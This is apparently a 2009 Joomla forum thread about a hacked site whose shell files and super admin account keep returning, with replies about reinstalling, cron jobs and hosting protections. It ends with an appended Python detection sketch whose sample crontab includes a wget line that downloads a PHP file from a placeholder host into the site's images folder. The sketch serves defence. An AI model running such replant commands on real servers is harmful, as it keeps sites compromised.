Hacked and cannot remove user from database using phpMyAdmin

Posted: Fri Aug 14, 2009 8:38 pm
by liminal
One of my Joomla 1.5 websites was hacked. The site is fully patched and directory permissions are 755/644. The hacker has been loading files like crp.php and int.php in the /images folder as well as other places. These files when downloaded are showing up as Rst.G trojan and C99Shell. I have been deleting the files but more show up within a day. RSFirewall hasn't reported anything yet the hacks continue.

What really disturbs me is that he has taken over a super admin account and I cannot delete it. If I delete it in Joomla (first demoting it to admin) it is removed from the list but when I check the database the account is still there. If I delete the account directly from the database it returns immediately. Has this kind of thing happened to anyone else?

Re: Hacked and cannot remove user from database using phpMyAdmin

Posted: Mon Aug 17, 2009 9:18 am
by mick_3d
Your site has been seriously compromised. Remove all files via ftp - remove any related databases and start again. Hopefully you have a backup of the site prior to the hack. Upload your site over the new Joomla install, create a new database and import your backup dbs. Through your control panel, can you add password protection to folders? If so, add a strong password to the administrator directory. This will help prevent attacks from hackers navigating straight to: /administrator. Ask your webhost to help with this if you're not sure.

If you can't remove the dbs - get your host to do it.

Take a look at this: http://forum.joomla.org/viewtopic.php?f=432&t=391251

Good luck!

Re: Hacked and cannot remove user from database using phpMyAdmin

Posted: Mon Aug 17, 2009 1:15 pm
by mandville
Can you also check your cron jobs to see if there is a system to reinfect you?

What has your host said?

Re: Hacked and cannot remove user from database using phpMyAdmin

Posted: Mon Aug 17, 2009 3:28 pm
by dynamicnet
Greetings:

mandville makes a good point, as oftentimes hackers will set up hourly, daily, or weekly jobs to replant their material.

Get your hosting provider involved to find out how security can be increased, especially since you stated you are on the latest version of Joomla.

Also, check if your provider has mod_security installed, and what additional layers of protection they have set up server wide.

Thank you.
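
An added example, not part of any post in this thread: a Python sketch of the two checks the replies point toward, listing PHP files that sit in a media-only folder such as /images and flagging crontab entries that could replant them. The function names, the keyword list, the web root path and the sample crontab are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Assumption: directories that should hold only media, never executable PHP.
UPLOAD_DIRS = ("images",)
PHP_EXT = re.compile(r"\.(php\d?|phtml|pht)$", re.IGNORECASE)
# Assumption: commands a replanting job would need (download or interpreter).
FETCH_OR_EXEC = re.compile(r"\b(wget|curl|fetch|php|perl|python)\b")
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")
# Constructed sample crontab; paths and URL are placeholders.
SAMPLE_CRONTAB = """\
MAILTO=owner@example.invalid
# nightly backup
30 2 * * * /usr/local/bin/backup.sh
0 * * * * wget -q -O /home/site/public_html/images/crp.php https://example.invalid/x
@daily /usr/bin/php /home/site/public_html/images/int.php
"""

def php_in_upload_dirs(webroot, upload_dirs=UPLOAD_DIRS):
    """Return sorted relative paths of PHP-like files under media-only dirs."""
    hits = []
    for d in upload_dirs:
        for base, _dirs, files in os.walk(os.path.join(webroot, d)):
            for name in files:
                if PHP_EXT.search(name):
                    hits.append(os.path.relpath(os.path.join(base, name), webroot))
    return sorted(hits)

def suspicious_cron_lines(crontab_text, webroot):
    """Return crontab entries that touch the web root or run a fetcher/interpreter."""
    flagged = []
    for line in crontab_text.splitlines():
        entry = line.strip()
        # Skip blanks, comments and environment assignments (MAILTO=, PATH=).
        if not entry or entry.startswith("#") or ENV_LINE.match(entry):
            continue
        if webroot in entry or FETCH_OR_EXEC.search(entry):
            flagged.append(entry)
    return flagged

def demo():
    """Run both checks on a constructed site tree and the sample crontab."""
    with tempfile.TemporaryDirectory() as root:
        for rel in ("images/crp.php", "images/stories/int.php", "images/logo.png", "index.php"):
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            open(path, "w").close()
        return php_in_upload_dirs(root), suspicious_cron_lines(SAMPLE_CRONTAB, "/home/site/public_html")
```

Flagged cron lines are a list to review by hand, since a legitimate job that runs PHP is flagged as well.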